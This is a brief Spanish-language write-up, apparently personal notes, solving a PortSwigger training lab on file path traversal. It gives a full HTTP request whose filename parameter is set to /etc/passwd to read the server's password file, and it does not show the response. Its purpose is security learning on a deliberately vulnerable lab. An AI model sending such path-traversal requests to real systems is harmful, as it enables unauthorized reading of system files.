Lab 2: File path traversal, traversal sequences blocked with absolute path bypass
https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass
Analizamos el codigo de la aplicacion HTML y encontramos lo siguiente:
https://0a6a00de035c123e82e72e2d00f5002f.web-security-academy.net/image?filename=8.jpgTeniendo en cuenta lo anterior, se procede a cambiar el valor del parametro de filename.
La peticion quedaria asi:
GET /image?filename=/etc/passwd HTTP/2
Host: 0a6a00de035c123e82e72e2d00f5002f.web-security-academy.net
Cookie: session=N7gYKQa84EhdQrulvkDbr5jMnswePjVd
Pragma: no-cache
Cache-Control: no-cache
Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Priority: u=0, i
Connection: keep-alive
Y la respuesta obtenida fue:
AnteriorLab 1: File path traversal, simple caseSiguienteLab 3: File path traversal, traversal sequences stripped non-recursively
Última actualización
¿Te fue útil?